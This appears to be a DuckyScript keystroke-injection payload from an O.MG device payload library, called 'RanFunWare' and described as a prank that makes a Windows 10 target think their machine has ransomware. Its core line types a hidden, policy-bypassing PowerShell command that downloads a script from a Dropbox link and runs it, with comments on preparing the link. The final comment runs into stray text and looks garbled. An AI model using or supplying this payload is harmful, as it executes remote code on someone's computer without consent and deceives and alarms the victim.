omg-payloads/payloads/library/prank/RanFunWare/payload.txt

16 lines
579 B
Plaintext

REM Title: RanFunWare
REM Author: atomiczsec
REM Description: This payload will prank your target into thinking their machine got hit with ransomware.
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1